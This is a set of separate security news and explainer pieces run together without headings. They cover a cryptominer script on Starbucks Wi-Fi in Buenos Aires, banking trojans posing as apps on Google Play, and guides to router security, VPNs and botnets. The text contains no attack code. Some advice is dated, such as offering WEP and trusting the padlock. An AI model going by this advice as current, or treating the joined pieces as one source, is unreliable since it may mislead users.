When Noah Dinkin, CEO of Stensul, a platform that helps marketers craft emails, visited a Starbucks in Buenos Aires last week, he discovered that the store’s Wi-Fi provider was hijacking his laptop to mine a digital currency. At the time, a Starbucks spokesperson stated that the issue was resolved quickly and wasn’t widespread, but Dinkin disagreed on the latter point. “This was observed by a friend and I in three separate Starbucks stores in Buenos Aires over multiple days following my original tweet, that week,” he wrote on Twitter on Wednesday. “It wasn't just one store.”

The Argentine internet provider responsible for Starbucks’ Wi-Fi in Buenos Aires—Fibertel— blamed hackers for planting the miner code on their network.

“Fibertel detected a security intrusion on one of the equipment that forms part of the Wi-Fi access solution that [we] provide to our client Starbucks Argentina,” Fibertel spokesperson Florencia Marcote said in an email. “The incident was identified and solved immediately by the specialized support.”

“It is not about any Fibertel practice, but an intrusion of security,” Marcote continued.

Cryptocurrency miners hijack your computer’s resources—usually your CPU—to crunch some math problems in order to generate digital coins. These scripts can impact your computer’s performance.

Dinkin noticed a 10-second delay when connecting to the Starbucks location’s Wi-Fi, so he checked the source code of the landing page and found a script for CoinHive, a popular embeddable cryptocurrency miner. Over the next few days, he and a friend checked at two more Starbucks locations in Buenos Aires and found the same code in both.

“Our stores are where a lot of our customers go to do personal things and conduct business, so we want to make sure that they’re safe and secure,” Reggie Borges, a Starbucks spokesperson, said over the phone. “Any time we see something that could happen in other places, we have to check it to make sure there’s no vulnerabilities and take next steps.”

According to Fibertel, the issue was isolated to Buenos Aires and has been resolved.

“This happened only [locally] in Buenos Aires and is completely solved since last week,” spokesperson Marcote wrote in an email.

With the value of cryptocurrencies skyrocketing, the incident in Argentina may be a pale horse as criminals continue to find ways to get other people to generate digital coins for them.

It has happened again, several banking Trojan samples have been found on Google Play, this time the malicious code targeted a number of Polish banks.

The malware was disguised as seemingly legitimate apps “Crypto Monitor”, a cryptocurrency price tracking app, and “StorySaver”, a third-party tool for downloading stories from Instagram.

The malicious code is able to display fake notifications and login forms on the infected device to harvest login credentials used to access legitimate banking applications. The code is also able to intercept SMS messages to bypass two-factor authentication used by the financial institutions.

The same malware was discovered by experts at security firm RiskIQ in November.

According to researchers from ESET, the “Crypto Monitor” app was uploaded to the Play store on November 25 by the developer walltestudio, while the “StorySaver” app was uploaded by the developer kirillsamsonov45 on November 29.

“Together, the apps had reached between 1000 and 5000 downloads at the time we reported them to Google on December 4. Both apps have since been removed from the store.” states the analysis published by ESET.

When the user launches the malicious apps, they compare the apps installed on the infected device against a list of fourteen apps used by Polish banks and once found one of them, the malicious code can display fake login forms imitating those of the targeted legitimate apps.

In some cases the fake login form is displayed to the user only after he clicks on a fake notification presented by the malware imitated the ones used by the targeted bank app.

“ESET telemetry shows that 96% of the detections come from Poland (the remaining 4% from Austria), apparently due to local social engineering campaigns propagating the malicious apps.” 

The experts noticed that it is very easy to remove the malicious apps by going to  Settings > (General) > Application manager/Apps, searching for the malicious apps and uninstalling them.

“To avoid falling prey to mobile malware in the future, make sure to always check app ratings and reviews, pay attention to what permissions you grant to apps, and use a reputable mobile security solution to detect and block latest threats.” concluded ESET.

ESET, who credited Witold Precikowski for the discovery, included the IoCs for this specific threat in its report.

Today’s small business network may include a wide range of wireless devices, from computers and phones, to IP Cameras, POS (Point of Sale) devices, and networked storage with confidential customer data. Taking basic steps to secure your  network will help protect your business data – and your customer's information – from compromise.

Understand How a Wireless Network Works

Going wireless generally requires connecting an internet "access point" – like a cable or DSL modem – to a wireless router, which sends a signal through the air, sometimes as far as several hundred feet. Any device within range can pull the signal from the air and access the internet.

Unless you take certain precautions, anyone nearby can use your network. That means your neighbors – or any hacker nearby – could "piggyback" on your network or access information on your device. If an unauthorized person uses your network to commit crime or send spam, the activity could be traced back to your account.

Use Encryption on Your Wireless Network

Once you go wireless, you should encrypt the information you send over your wireless network, so that nearby attackers can’t eavesdrop on these communications. Encryption scrambles the information you send into a code so that it’s not accessible to others. Using encryption is the most effective way to secure your network from intruders.

Two main types of encryption are available for this purpose: Wi-Fi Protected Access (WPA) and Wired Equivalent Privacy (WEP). Your computer, router, and other equipment must use the same encryption. WPA2 is strongest; use it if you have a choice. It should protect you against most hackers. Some older routers use only WEP encryption, which likely won’t protect you from some common hacking programs. Consider buying a new router with WPA2 capability.

Wireless routers often come with the encryption feature turned off. You must turn it on. The directions that come with your router should explain how. If they don't, check the company’s website.

Limit Access to Your Network

Allow only specific devices to access your wireless network. Every device that is able to communicate with a network is assigned a unique Media Access Control (MAC) address. Wireless routers usually have a mechanism to allow only devices with particular MAC addresses to access to the network. Some hackers have mimicked MAC addresses, so don't rely on this step alone.

Secure Your Router

It’s also important to protect your network from attacks over the internet by keeping your router secure. Your router directs traffic between your local network and the internet. So, it’s your first line of defense for guarding against such attacks. If you don't take steps to secure your router, strangers could gain access to sensitive personal or financial information on your device. Strangers also could seize control of your router, to direct you to fraudulent websites.

Change the name of your router from the default. The name of your router (often called the service set identifier or SSID) is likely to be a standard, default ID assigned by the manufacturer. Change the name to something unique that only you know.

Change your router's pre-set password(s). The manufacturer of your wireless router probably assigned it a standard default password that allows you to set up and operate the router, as its “administrator.” Hackers know these default passwords, so change it to something only you know.  The same goes for any default “user” passwords. Use long and complex passwords – think at least 12 characters, with a mix of numbers, symbols, and upper and lower case letters. Visit the company’s website to learn how to change the password.

Turn off any “Remote Management” features. Some routers offer an option to allow remote access to your router’s controls, such as to enable the manufacturer to provide technical support.  Never leave this feature enabled. Hackers can use them to get into your home network.

Log out as Administrator: Once you’ve set up your router, log out as administrator, to lessen the risk that someone can piggyback on your session to gain control of your device.

Keep your router up-to-date: To be secure and effective, the software that comes with your router needs occasional updates. Before you set up a new router and periodically thereafter, visit the manufacturer’s website to see if there’s a new version of the software available for download. To make sure you hear about the latest version, register your router with the manufacturer and sign up to get updates.

And when you secure your router, don’t forget to secure your computer too. Use the same  basic computer security practices that you would for any computer connected to the internet. For example, use protections like antivirus, antispyware, and a firewall -- and keep these protections up-to-date.

Protect Your Network during Mobile Access

Apps now allow you to access your home network from a mobile device. Before you do, be sure that some security features are in place.

Use a strong password on any app that accesses your network. Log out of the app when you’re not using it.  That way, no one else can access the app if your phone is lost or stolen.

Password protect your phone or other mobile device. Even if your app has a strong password, it’s best to protect your device with one, too.

VPNs, or Virtual Private Networks, have been in the news a lot lately. In July, there was the revelation that Apple had removed VPNs from the Chinese App Store, and more recently in October, it turned out that VPNs were an effective safeguard against the worrying Krack Wi-Fi vulnerability. Even with all the publicity, there are plenty of people who still don’t know what a VPN is and how to use it – the name alone can seem strange and abstract to the average consumer. However, using a VPN couldn’t be simpler. Let’s take a quick look at how the software works and why it’s an essential tool for your digital life.

How a VPN works

When you access the internet without a VPN, your computer connection is basically ‘naked’, as it were. Your Internet Service Provider (ISP) can see what content you access. That includes streaming sites, torrents, and games. But when you connect to a VPN, the VPN server acts as an intermediary between your computer and the web.

To put it simply: you send a request to the VPN, the VPN sends a request to the server where the content is hosted, and then the process runs in reverse. However, because the VPN is between you and the content, your ISP will only see you accessing the VPN. Thus, it won’t see your internet activity. Besides acting as an intermediary, VPNs protect you in two other key ways: they encrypt your internet traffic and grant you a new IP address (so your real IP is hidden).

Encryption 101

On a basic level, encryption involves using advanced mathematics to make your data unreadable to third-parties – it will look like gibberish to everyone other than you and your VPN. In effect, a VPN, can hide your internet traffic not just from your ISP, but also from anyone else on the same Wi-Fi network as you. That makes VPNs a necessary tool on public Wi-Fi in places like cafes or libraries.

Why IP addresses matter

VPNs also grant you a new IP address. This not only safeguards your anonymity, but also widens the amount of content you can access. Think of your IP address as being like a physical address in the real world – it tells internet servers where to send information and content you request. But because a VPN provides you with a new IP address, sites you access only know the IP of the VPN, and not the one tied to your computer.

Also, many content providers like Netflix and BBC iPlayer use IP addresses as a way to figure out whether or not to allow you to access content that is limited to a particular region. By using a VPN server in a different country, you can get a foreign IP address, unlocking tons of media you might not otherwise have access to.

VPNs vs proxies: what VPNs actually hide

Of course, if you’ve ever used a proxy, a lot of this might sound familiar. Plenty of people use proxies to surf the web. However, the major difference between proxies and VPNs is that while proxies mask your traffic via your web browser, VPNs cover all your internet activity, including torrent clients and games. What does that mean for the average consumer? If you want total privacy and encryption, then VPN is the way to go.

Picking a VPN: what to look for

Now that you’ve gained a bit of VPN expertise, you may feel ready to try one for yourself. But how to choose? Even so, you might also want a few considerations to help you judge for yourself. Below are three questions (and some related follow-up queries) that will come in handy.

Can you use the VPN on all your devices? A good VPN provider should be able to offer you a working service wherever you go. On the road? You’ll need a VPN on your smartphone or tablet. Want peace of mind at home? Get a VPN on your desktop computer or network router. When checking to see what platforms a VPN service provides apps for, also check the company’s device usage policy. Can you connect to the VPN on more than one device at a time? If so, how many devices are supported?

What VPN protocols are available? VPN protocols control how data is passed between your device and the VPN server. PPTP is the fastest protocol, but it’s also the least secure. Meanwhile, OpenVPN is probably the most secure, but it doesn’t work on all devices. A good VPN provider should have multiple protocols available, allowing you to switch between them as circumstances require.

Those are some basic points to look out for, but the truth is that VPN providers can offer a raft of all sorts of different features. But beyond various settings and extras like proprietary security protocols, at the end of the day, what’s most important is trust.

You’re entrusting a VPN provider with your privacy, so you should make sure they have the track-record and reputation to back up that responsibility.

When cybercriminals strike, it is often the groups or individuals responsible for the attack (e.g., Anonymous, Guardians of Peace, MafiaBoy); the victims (e.g., Target, Sony, Dyn) or the malware itself (e.g., WannaCry, Shamoon, Conficker) that make the headlines. The critical role of botnets in the organization and the launch of cyberattacks is less commonly written about. This article explains what botnets are, how they operate and what can be done to protect your computers and devices from being recruited to a botnet.

Understanding Botnets

As we discussed in a previous post about cybersecurity ignorance, over 70 percent of Americans are unaware of what a botnet is. When the security of a computer or connected device is compromised by an attack, there are several things that its payload can do. It could execute a piece of ransomware, encrypting user files and display a message demanding payment for their release. It could launch spyware to collect information about the user, stealing personal data or harvesting contacts. It could even cause damage to your hardware and shut down your device – although this is not usually in the cybercriminal’s best interest.

Or it could connect your computer to a hidden network of similar hijacked devices and inform its master that it is ready to take orders. It would become what is termed a bot or a zombie, and while it may still operate normally in other respects, it has become the latest addition to a botnet.

Once recruited, a bot will start monitoring for messages from its new master or masters. These messages could originate from a dedicated server (sometimes termed a command and control server) or even via code on a website. This is the traditional server-client botnet. Some of the latest botnets operate on a peer-to-peer (P2P) basis, with each new device acting as both zombie and zombie master in a distributed network.

Methods of Attack Using Botnets

So what can a botnet do? There are certain types of attack that a botnet will usually instigate, although its activity can be quickly changed through altering instructions. Since the devices in question are already compromised, there is no security to overcome and no resistance to its orders.

One of the most common tasks of a botnet is to distribute spam, which will usually contain ransomware. To give an idea of the scale of the problem, Cisco’s 2017 Annual Cybersecurity Report shows that spam accounts for 65 percent of all email, with 8 to 10 percent cited as malicious. Due to a combination of spam filters and consumer education, this method of attack is relatively unproductive and relies upon vast numbers of messages being sent out. For example, when ESET uncovered the Windigo botnet in 2014, it was sending out 35 million spam messages per day.

Another mode of operation is the infamous DDoS attack. In an instant, all bots in the botnet can be instructed to flood a server or servers with connection requests, effectively taking that service out of action. Again, this is a blunt, relatively unsophisticated weapon and, due to improved DDoS mitigation technology, is usually short-term in nature.

For client-server types of botnets, the messages are usually transmitted using the internet relay chat (IRC) protocol. Such communication can be relatively easy to detect and block or even hijack, so smarter forms of attack are being developed to outwit the cybersecurity provider. For example, it has been proven possible to issue commands via Twitter, LinkedIn and even JPEG metadata and to switch between such channels. The P2P type of botnet mentioned above also avoids the pitfalls of IRC communication.

Lack of Vigilance is Still the Weakest Link

Facing up to the power and sophistication of botnets can be scary at first, but it must be remembered that there are equally smart minds at work in the battle against cybercrime. The best forms of protection remain unchanged: install regular security updates, use strong password protection, look for the padlock next to a URL before divulging sensitive information and never click on email or social media links unless you are 100 percent sure they are genuine.

As explained in Malwarebytes’ ‘State of Malware Report,’ there are specific concerns about the prioritization of security when it comes to the Internet of Things and DDoS attacks. These vulnerabilities were ruthlessly exploited in October 2016 by the Mirai botnet, which targeted Dyn Inc. and effectively shut down Twitter, Spotify and other sites.

It was discovered that Mirai’s ability to launch such a ferocious DDoS attack (at one point reaching speeds of 1 tbps) was due to its choice of bots – IP cameras, home routers and other devices rather than PCs. Many of these were configured with their factory passwords and so were simple to hack.

As the Internet of Things grows, it will become more important than ever for companies to choose devices with robust security protection, to update passwords upon setup and to up-skill their IT support teams to monitor for threats. Likewise, homeowners should shop for smart devices with security in mind and change their default passwords.

Why the Worst Cyberattack May Never Happen

If the fear of botnets bringing down the internet is keeping you up at night, then this end section should give you some reassurance. Setting up a botnet that can successfully evade all of the security measures set up to detect and bring it down is resource-intensive; this makes it an incredibly valuable asset. The bigger a botnet is, the harder it becomes for it to fly under the radar. When large botnets are detected, it is often in the wake of a big attack that exposes its chain of command. Once found, botnets often fall hard with significant computer resources put out of action by law enforcement and people sent to jail.

In most cases, it serves the cybercriminals best to use botnets as stealth weapons, launching the occasional assault before covering their tracks, evolving and then looking for the next opportunity to strike.